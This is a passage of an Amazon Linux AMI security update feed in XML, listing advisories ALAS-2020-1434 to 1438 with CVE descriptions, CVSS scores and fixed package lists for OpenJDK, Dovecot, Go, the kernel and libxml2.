arch="i686"><filename>Packages/clamav-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.102.4-1.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1434</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1434: important priority package update for java-1.8.0-openjdk</title><issued date="2020-09-14 20:58:00" /><updated date="2020-09-16 18:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14621:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2020-14621 :
1856885: CVE-2020-14621 OpenJDK: XML validation manipulation due to incomplete application of the use-grammar-pool-only feature (JAXP, 8242136)
CVE-2020-14593:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N).
CVE-2020-14593 :
1856784: CVE-2020-14593 OpenJDK: Incomplete bounds checks in Affine Transformations (2D, 8240119)
CVE-2020-14583:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
CVE-2020-14583 :
1856448: CVE-2020-14583 OpenJDK: Bypass of boundary checks in nio.Buffer via concurrent access (Libraries, 8238920)
CVE-2020-14579:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u261 and 8u251; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1856995: CVE-2020-14579 OpenJDK: Unexpected exception raised by DerValue.equals() (Libraries, 8237736)
CVE-2020-14578:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u261 and 8u251; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1856991: CVE-2020-14578 OpenJDK: Unexpected exception raised by DerInputStream (Libraries, 8237731)
CVE-2020-14577:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2020-14577 :
1856988: CVE-2020-14577 OpenJDK: HostnameChecker does not ensure X.509 certificate names are in normalized form (JSSE, 8237592)
CVE-2020-14556:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
CVE-2020-14556 :
1856896: CVE-2020-14556 OpenJDK: Incorrect handling of access control context in ForkJoinPool (Libraries, 8237117)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14556" title="" id="CVE-2020-14556" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14577" title="" id="CVE-2020-14577" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14578" title="" id="CVE-2020-14578" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14579" title="" id="CVE-2020-14579" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14583" title="" id="CVE-2020-14583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14593" title="" id="CVE-2020-14593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14621" title="" id="CVE-2020-14621" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.265.b01-0.54.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.265.b01-0.54.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.265.b01-0.54.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.265.b01-0.54.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.265.b01-0.54.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.265.b01-0.54.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.265.b01-0.54.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.265.b01-0.54.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.265.b01-0.54.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.265.b01-0.54.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.265.b01-0.54.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.265.b01-0.54.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.265.b01-0.54.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.265.b01-0.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1435</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1435: important priority package update for dovecot</title><issued date="2020-10-26 17:59:00" /><updated date="2020-10-27 21:32:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12674:
In Dovecot before 2.3.11.3, sending a specially formatted RPA request will crash the auth service because a length of zero is mishandled.
A flaw was found in dovecot. An attacker can use the way dovecot handles RPA (Remote Passphrase Authentication) to crash the authentication process repeatedly preventing login. The highest threat from this vulnerability is to system availability.
1866317: CVE-2020-12674 dovecot: Crash due to assert in RPA implementation
CVE-2020-12673:
In Dovecot before 2.3.11.3, sending a specially formatted NTLM request will crash the auth service because of an out-of-bounds read.
A flaw was found in dovecot. An out-of-bounds read flaw was found in the way dovecot handled NTLM authentication allowing an attacker to crash the dovecot auth process repeatedly preventing login. The highest threat from this vulnerability is to system availability.
1866313: CVE-2020-12673 dovecot: Out of bound reads in dovecot NTLM implementation
CVE-2020-12100:
In Dovecot before 2.3.11.3, uncontrolled recursion in submission, lmtp, and lda allows remote attackers to cause a denial of service (resource consumption) via a crafted e-mail message with deeply nested MIME parts.
A flaw was found in dovecot. A remote attacker could cause a denial of service by repeatedly sending emails containing MIME parts containing malicious content of which dovecot will attempt to parse. The highest threat from this vulnerability is to system availability.
1866309: CVE-2020-12100 dovecot: Resource exhaustion via deeply nested MIME parts
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12100" title="" id="CVE-2020-12100" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12673" title="" id="CVE-2020-12673" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12674" title="" id="CVE-2020-12674" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dovecot-pgsql" version="2.2.36" release="6.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-pgsql-2.2.36-6.21.amzn1.x86_64.rpm</filename></package><package name="dovecot-mysql" version="2.2.36" release="6.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-mysql-2.2.36-6.21.amzn1.x86_64.rpm</filename></package><package name="dovecot-devel" version="2.2.36" release="6.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-devel-2.2.36-6.21.amzn1.x86_64.rpm</filename></package><package name="dovecot-pigeonhole" version="2.2.36" release="6.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-pigeonhole-2.2.36-6.21.amzn1.x86_64.rpm</filename></package><package name="dovecot-debuginfo" version="2.2.36" release="6.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-debuginfo-2.2.36-6.21.amzn1.x86_64.rpm</filename></package><package name="dovecot" version="2.2.36" release="6.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-2.2.36-6.21.amzn1.x86_64.rpm</filename></package><package name="dovecot-devel" version="2.2.36" release="6.21.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-devel-2.2.36-6.21.amzn1.i686.rpm</filename></package><package name="dovecot-pgsql" version="2.2.36" release="6.21.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-pgsql-2.2.36-6.21.amzn1.i686.rpm</filename></package><package name="dovecot-mysql" version="2.2.36" release="6.21.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-mysql-2.2.36-6.21.amzn1.i686.rpm</filename></package><package name="dovecot" version="2.2.36" release="6.21.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-2.2.36-6.21.amzn1.i686.rpm</filename></package><package name="dovecot-debuginfo" version="2.2.36" release="6.21.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-debuginfo-2.2.36-6.21.amzn1.i686.rpm</filename></package><package name="dovecot-pigeonhole" version="2.2.36" release="6.21.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-pigeonhole-2.2.36-6.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1436</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1436: medium priority package update for golang</title><issued date="2020-10-26 18:04:00" /><updated date="2020-10-27 23:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-16845:
Go before 1.13.15 and 14.x before 1.14.7 can have an infinite read loop in ReadUvarint and ReadVarint in encoding/binary via invalid inputs.
1867099: CVE-2020-16845 golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs
CVE-2020-14040:
The x/text package before 0.3.3 for Go has a vulnerability in encoding/unicode that could lead to the UTF-16 decoder entering an infinite loop, causing the program to crash or run out of memory. An attacker could provide a single byte to a UTF16 decoder instantiated with UseBOM or ExpectBOM to trigger an infinite loop if the String function on the Decoder is called, or the Decoder is passed to golang.org/x/text/transform.String.
A denial of service vulnerability was found in the golang.org/x/text library. A library or application must use one of the vulnerable functions, such as unicode.Transform, transform.String, or transform.Byte, to be susceptible to this vulnerability. If an attacker is able to supply specific characters or strings to the vulnerable application, there is the potential to cause an infinite loop to occur using more memory, resulting in a denial of service.
1853652: CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14040" title="" id="CVE-2020-14040" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16845" title="" id="CVE-2020-16845" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-docs" version="1.13.15" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.13.15-1.59.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.13.15" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.13.15-1.59.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.13.15" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.13.15-1.59.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.13.15" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.13.15-1.59.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.13.15" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.13.15-1.59.amzn1.noarch.rpm</filename></package><package name="golang" version="1.13.15" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.13.15-1.59.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.13.15" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.13.15-1.59.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.13.15" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.13.15-1.59.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.13.15" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.13.15-1.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1437</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1437: important priority package update for kernel</title><issued date="2020-10-26 18:08:00" /><updated date="2023-06-29 22:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-20565:
An issue in the HID driver in the Linux kernel may lead to invalid memory access.
CVE-2020-26088:
A missing capabilities check when creating NFC raw sockets could be used by local attackers to create raw sockets, bypassing security mechanisms allowing them to create or listen to NFC communication frames.
CVE-2020-25645:
A flaw was found in the Linux kernel. Traffic between two Geneve endpoints may be unencrypted when IPsec is configured to encrypt traffic for the specific UDP port used by the GENEVE tunnel allowing anyone in between the two endpoints to read the traffic unencrypted. The main threat from this vulnerability is to data confidentiality.
CVE-2020-25643:
A flaw was found in the HDLC_PPP module of the Linux kernel. Memory corruption and a read overflow is caused by improper input validation in the ppp_cp_parse_cr function which can cause the system to crash or cause a denial of service. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2020-25641:
A flaw was found in the Linux kernel's implementation of biovecs. A zero-length biovec request issued by the block subsystem could cause the kernel to enter an infinite loop, causing a denial of service. This flaw allows a local attacker with basic privileges to issue requests to a block device, resulting in a denial of service. The highest threat from this vulnerability is to system availability.
CVE-2020-25285:
A flaw was found in the Linux kernels sysctl handling code for hugepages management. When multiple root level processes would write to modify the /proc/sys/vm/nr_hugepages file it could create a race on internal variables leading to a system crash or memory corruption.
CVE-2020-25284:
A flaw was found in the capabilities check of the rados block device functionality in the Linux kernel. Incorrect capability checks could alllow a local user with root priviledges (but no capabilities) to add or remove Rados Block Devices from the system.
CVE-2020-25212:
A flaw was found in the NFSv4 implementation where when mounting a remote attacker controlled server it could return specially crafted response allow for local memory corruption and possibly privilege escalation.
CVE-2020-14390:
A flaw was found in the Linux kernel. When changing screen size, an out-of-bounds memory write can occur leading to memory corruption or a denial of service. Due to the nature of the flaw, privilege escalation cannot be fully ruled out.
CVE-2020-14331:
A flaw was found in the Linux kernel's implementation of the invert video code on VGA consoles when a local attacker attempts to resize the console, calling an ioctl VT_RESIZE, which causes an out-of-bounds write to occur. This flaw allows a local user with access to the VGA console to crash the system, potentially escalating their privileges on the system. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2020-14314:
A memory out-of-bounds read flaw was found in the Linux kernel's ext3/ext4 file system, in the way it accesses a directory with broken indexing. This flaw allows a local user to crash the system if the directory exists. The highest threat from this vulnerability is to system availability.
CVE-2020-12888:
A flaw was found in the Linux kernel, where it allows userspace processes, for example, a guest VM, to directly access h/w devices via its VFIO driver modules. The VFIO modules allow users to enable or disable access to the devices' MMIO memory address spaces. If a user attempts to access the read/write devices' MMIO address space when it is disabled, some h/w devices issue an interrupt to the CPU to indicate a fatal error condition, crashing the system. This flaw allows a guest user or process to crash the host system resulting in a denial of service.
CVE-2019-19448:
A flaw was found in the Linux kernel's implementation of BTRFS free space management, where the kernel does not correctly manage the lifetime of internal data structures used. An attacker could use this flaw to corrupt memory or escalate privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19448" title="" id="CVE-2019-19448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12888" title="" id="CVE-2020-12888" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14314" title="" id="CVE-2020-14314" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14331" title="" id="CVE-2020-14331" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14390" title="" id="CVE-2020-14390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25212" title="" id="CVE-2020-25212" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25284" title="" id="CVE-2020-25284" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25285" title="" id="CVE-2020-25285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25641" title="" id="CVE-2020-25641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25643" title="" id="CVE-2020-25643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25645" title="" id="CVE-2020-25645" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26088" title="" id="CVE-2020-26088" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20565" title="" id="CVE-2022-20565" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.200-116.320.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1438</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1438: medium priority package update for libxml2</title><issued date="2020-10-26 18:09:00" /><updated date="2020-10-27 21:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7595:
xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation.
1799786: CVE-2020-7595 libxml2: infinite loop in xmlStringLenDecodeEntities in some end-of-file situations
CVE-2019-20388:
A memory leak was found in the xmlSchemaValidateStream function of libxml2. Applications that use this library may be vulnerable to memory not being freed leading to a denial of service. System availability is the highest threat from this vulnerability.
1799734: CVE-2019-20388 libxml2: memory leak in xmlSchemaPreRun in xmlschemas.c
CVE-2019-19956:
xmlParseBalancedChunkMemoryRecover in parser.c in libxml2 before 2.9.10 has a memory leak related to newDoc->oldNs.
1788856: CVE-2019-19956 libxml2: memory leak in xmlParseBalancedChunkMemoryRecover in parser.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19956" title="" id="CVE-2019-19956" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20388" title="" id="CVE-2019-20388" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7595" title="" id="CVE-2020-7595" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-python26" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.4.41.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.4.41.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.4.41.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.4.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.4.41.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.4.41.amzn1" epoch="0" 